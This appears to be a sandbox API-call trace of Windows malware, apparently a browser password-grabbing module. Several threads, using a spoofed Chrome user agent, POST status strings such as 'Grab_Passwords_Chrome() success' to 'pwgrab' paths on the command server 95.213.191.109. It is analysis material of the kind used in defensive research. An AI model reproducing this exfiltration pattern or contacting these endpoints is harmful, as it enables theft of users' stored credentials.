	[0211.692] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbba8) returned 1
	[0211.693] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff648) returned 1
	[0211.693] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6db0) returned 1
	[0211.693] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbb80) returned 1
	[0211.693] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbb08) returned 1
	[0211.693] WinHttpCloseHandle (hInternet=0x26cdc48) returned 1
	[0211.693] WinHttpCloseHandle (hInternet=0x22c5418) returned 1
	[0211.693] WinHttpCloseHandle (hInternet=0x22c5330) returned 1
	[0211.693] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbf90) returned 1

Thread:
	id = 225
	os_tid = 0x150

	[0207.426] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5500
	[0207.427] WinHttpConnect (hSession=0x22c5500, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c55e8
	[0207.427] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc2b0
	[0207.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Browser passwords are empty", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28
	[0207.427] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc2d8
	[0207.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Browser passwords are empty", cchWideChar=-1, lpMultiByteStr=0x26cc2d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Browser passwords are empty", lpUsedDefaultChar=0x0) returned 28
	[0207.427] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc300
	[0207.427] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb88
	[0207.427] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffba0
	[0207.427] GetTickCount () returned 0xa8aa26
	[0207.427] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0207.427] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x228a3a8
	[0207.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x31eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0207.427] WinHttpSetTimeouts (hInternet=0x22c5500, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0207.427] WinHttpOpenRequest (hConnect=0x22c55e8, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26abb60
	[0207.427] WinHttpSetOption (hInternet=0x26abb60, dwOption=0x1f, lpBuffer=0x31ef228, dwBufferLength=0x4) returned 1
	[0207.427] WinHttpSendRequest (hRequest=0x26abb60, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB52A6\r\nContent-Length: 132\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x228a3a8*, dwOptionalLength=0x84, dwTotalLength=0x84, dwContext=0x0) returned 1
	[0208.471] WinHttpReceiveResponse (hRequest=0x26abb60, lpReserved=0x0) returned 1
	[0208.590] WinHttpQueryHeaders (in: hRequest=0x26abb60, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x31ef218, lpdwBufferLength=0x31ef214, lpdwIndex=0x0 | out: lpBuffer=0x31ef218*, lpdwBufferLength=0x31ef214*=0x4, lpdwIndex=0x0) returned 1
	[0208.590] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc300) returned 1
	[0208.590] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb88) returned 1
	[0208.590] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffba0) returned 1
	[0208.590] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc2d8) returned 1
	[0208.590] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0208.590] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x228a3a8) returned 1
	[0208.590] Sleep (dwMilliseconds=0xbb8) 
	[0211.805] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbc20) returned 1
	[0211.805] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff600) returned 1
	[0211.805] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6f18) returned 1
	[0211.805] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbf8) returned 1
	[0211.805] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0211.805] WinHttpCloseHandle (hInternet=0x26abb60) returned 1
	[0211.805] WinHttpCloseHandle (hInternet=0x22c55e8) returned 1
	[0211.805] WinHttpCloseHandle (hInternet=0x22c5500) returned 1
	[0211.806] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc2b0) returned 1

Thread:
	id = 226
	os_tid = 0x754

	[0211.927] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5500
	[0211.927] WinHttpConnect (hSession=0x22c5500, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c55e8
	[0211.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc288
	[0211.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab passwords: No passwords found", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45
	[0211.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ab8
	[0211.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab passwords: No passwords found", cchWideChar=-1, lpMultiByteStr=0x22a5ab8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab passwords: No passwords found", lpUsedDefaultChar=0x0) returned 45
	[0211.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6378
	[0211.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb58
	[0211.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0211.928] GetTickCount () returned 0xa8b8a7
	[0211.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0211.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xa0) returned 0x22d2368
	[0211.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x268eb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0211.928] WinHttpSetTimeouts (hInternet=0x22c5500, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0211.928] WinHttpOpenRequest (hConnect=0x22c55e8, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x271f00
	[0211.928] WinHttpSetOption (hInternet=0x271f00, dwOption=0x1f, lpBuffer=0x268f228, dwBufferLength=0x4) returned 1
	[0211.928] WinHttpSendRequest (hRequest=0x271f00, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB6127\r\nContent-Length: 149\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x22d2368*, dwOptionalLength=0x95, dwTotalLength=0x95, dwContext=0x0) returned 1
	[0212.452] WinHttpReceiveResponse (hRequest=0x271f00, lpReserved=0x0) returned 1
	[0212.453] WinHttpQueryHeaders (in: hRequest=0x271f00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f218, lpdwBufferLength=0x268f214, lpdwIndex=0x0 | out: lpBuffer=0x268f218*, lpdwBufferLength=0x268f214*=0x4, lpdwIndex=0x0) returned 1
	[0212.453] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6378) returned 1
	[0212.453] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb58) returned 1
	[0212.453] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0212.453] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ab8) returned 1
	[0212.453] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311108) returned 1
	[0212.453] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d2368) returned 1
	[0212.453] Sleep (dwMilliseconds=0xbb8) 
	[0215.670] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc418) returned 1
	[0215.671] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff660) returned 1
	[0215.671] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22620e8) returned 1
	[0215.671] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc238) returned 1
	[0215.671] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc1e8) returned 1
	[0215.671] WinHttpCloseHandle (hInternet=0x271f00) returned 1
	[0215.671] WinHttpCloseHandle (hInternet=0x22c55e8) returned 1
	[0215.671] WinHttpCloseHandle (hInternet=0x22c5500) returned 1
	[0215.671] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc288) returned 1

Thread:
	id = 269
	os_tid = 0xd18

	[0219.089] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5500
	[0219.090] WinHttpConnect (hSession=0x22c5500, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c55e8
	[0219.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737d40
	[0219.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(0)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25
	[0219.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737d68
	[0219.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(0)", cchWideChar=-1, lpMultiByteStr=0x2737d68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grab_Passwords_Chrome(0)", lpUsedDefaultChar=0x0) returned 25
	[0219.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737d90
	[0219.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff948
	[0219.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0219.090] GetTickCount () returned 0xa8d165
	[0219.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0219.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x282f90
	[0219.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x268eb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0219.091] WinHttpSetTimeouts (hInternet=0x22c5500, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0219.091] WinHttpOpenRequest (hConnect=0x22c55e8, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x271f00
	[0219.091] WinHttpSetOption (hInternet=0x271f00, dwOption=0x1f, lpBuffer=0x268f228, dwBufferLength=0x4) returned 1
	[0219.091] WinHttpSendRequest (hRequest=0x271f00, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB79E5\r\nContent-Length: 129\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x282f90*, dwOptionalLength=0x81, dwTotalLength=0x81, dwContext=0x0) returned 1
	[0219.727] WinHttpReceiveResponse (hRequest=0x271f00, lpReserved=0x0) returned 1
	[0219.727] WinHttpQueryHeaders (in: hRequest=0x271f00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f218, lpdwBufferLength=0x268f214, lpdwIndex=0x0 | out: lpBuffer=0x268f218*, lpdwBufferLength=0x268f214*=0x4, lpdwIndex=0x0) returned 1
	[0219.727] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737d90) returned 1
	[0219.727] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff948) returned 1
	[0219.727] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0219.727] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737d68) returned 1
	[0219.727] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311108) returned 1
	[0219.727] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x282f90) returned 1
	[0219.727] Sleep (dwMilliseconds=0xbb8) 
	[0222.740] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb978) returned 1
	[0222.740] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa50) returned 1
	[0222.740] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7350) returned 1
	[0222.740] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb810) returned 1
	[0222.740] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb950) returned 1
	[0222.740] WinHttpCloseHandle (hInternet=0x271f00) returned 1
	[0222.740] WinHttpCloseHandle (hInternet=0x22c55e8) returned 1
	[0222.740] WinHttpCloseHandle (hInternet=0x22c5500) returned 1
	[0222.740] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737d40) returned 1

Thread:
	id = 270
	os_tid = 0xd0c

	[0219.092] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c56d0
	[0219.093] WinHttpConnect (hSession=0x22c56d0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5160
	[0219.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f48
	[0219.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(1)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25
	[0219.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f70
	[0219.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(1)", cchWideChar=-1, lpMultiByteStr=0x2737f70, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grab_Passwords_Chrome(1)", lpUsedDefaultChar=0x0) returned 25
	[0219.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f98
	[0219.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff888
	[0219.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff5d0
	[0219.093] GetTickCount () returned 0xa8d165
	[0219.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0219.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x291aa8
	[0219.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x2d8eb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0219.093] WinHttpSetTimeouts (hInternet=0x22c56d0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0219.093] WinHttpOpenRequest (hConnect=0x22c5160, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x22c98d8
	[0219.093] WinHttpSetOption (hInternet=0x22c98d8, dwOption=0x1f, lpBuffer=0x2d8f228, dwBufferLength=0x4) returned 1
	[0219.093] WinHttpSendRequest (hRequest=0x22c98d8, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB79E5\r\nContent-Length: 129\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x291aa8*, dwOptionalLength=0x81, dwTotalLength=0x81, dwContext=0x0) returned 1
	[0219.728] WinHttpReceiveResponse (hRequest=0x22c98d8, lpReserved=0x0) returned 1
	[0219.728] WinHttpQueryHeaders (in: hRequest=0x22c98d8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2d8f218, lpdwBufferLength=0x2d8f214, lpdwIndex=0x0 | out: lpBuffer=0x2d8f218*, lpdwBufferLength=0x2d8f214*=0x4, lpdwIndex=0x0) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f98) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff888) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff5d0) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f70) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x291aa8) returned 1
	[0219.728] Sleep (dwMilliseconds=0xbb8) 
	[0222.743] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737bd8) returned 1
	[0222.743] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffbb8) returned 1
	[0222.743] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7398) returned 1
	[0222.743] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737bb0) returned 1
	[0222.743] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2736788) returned 1
	[0222.743] WinHttpCloseHandle (hInternet=0x22c98d8) returned 1
	[0222.743] WinHttpCloseHandle (hInternet=0x22c5160) returned 1
	[0222.743] WinHttpCloseHandle (hInternet=0x22c56d0) returned 1
	[0222.743] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f48) returned 1

Thread:
	id = 271
	os_tid = 0xd08

	[0219.094] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5418
	[0219.094] WinHttpConnect (hSession=0x22c5418, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5078
	[0219.094] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27381a0
	[0219.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(2)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25
	[0219.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27381c8
	[0219.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(2)", cchWideChar=-1, lpMultiByteStr=0x27381c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grab_Passwords_Chrome(2)", lpUsedDefaultChar=0x0) returned 25
	[0219.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27381f0
	[0219.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffdf8
	[0219.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe10
	[0219.095] GetTickCount () returned 0xa8d165
	[0219.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311420
	[0219.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x22c34e8
	[0219.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x2edeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0219.095] WinHttpSetTimeouts (hInternet=0x22c5418, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0219.095] WinHttpOpenRequest (hConnect=0x22c5078, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26e438
	[0219.095] WinHttpSetOption (hInternet=0x26e438, dwOption=0x1f, lpBuffer=0x2edf228, dwBufferLength=0x4) returned 1
	[0219.095] WinHttpSendRequest (hRequest=0x26e438, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB79E5\r\nContent-Length: 129\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x22c34e8*, dwOptionalLength=0x81, dwTotalLength=0x81, dwContext=0x0) returned 1
	[0219.728] WinHttpReceiveResponse (hRequest=0x26e438, lpReserved=0x0) returned 1
	[0219.728] WinHttpQueryHeaders (in: hRequest=0x26e438, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2edf218, lpdwBufferLength=0x2edf214, lpdwIndex=0x0 | out: lpBuffer=0x2edf218*, lpdwBufferLength=0x2edf214*=0x4, lpdwIndex=0x0) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27381f0) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffdf8) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe10) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27381c8) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311420) returned 1
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c34e8) returned 1
	[0219.728] Sleep (dwMilliseconds=0xbb8) 
	[0222.741] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737c50) returned 1
	[0222.741] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffc18) returned 1
	[0222.741] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7278) returned 1
	[0222.741] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737c28) returned 1
	[0222.741] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737c00) returned 1
	[0222.741] WinHttpCloseHandle (hInternet=0x26e438) returned 1
	[0222.742] WinHttpCloseHandle (hInternet=0x22c5078) returned 1
	[0222.742] WinHttpCloseHandle (hInternet=0x22c5418) returned 1
	[0222.742] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27381a0) returned 1

Thread:
	id = 273
	os_tid = 0xd20

	[0219.775] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c4ea8
	[0219.775] WinHttpConnect (hSession=0x22c4ea8, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5248
	[0219.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27381c8
	[0219.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome() success", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32
	[0219.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a64c8
	[0219.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome() success", cchWideChar=-1, lpMultiByteStr=0x22a64c8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grab_Passwords_Chrome() success", lpUsedDefaultChar=0x0) returned 32
	[0219.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27381f0
	[0219.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffdf8
	[0219.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff948
	[0219.775] GetTickCount () returned 0xa8d413
	[0219.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0219.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x2738790
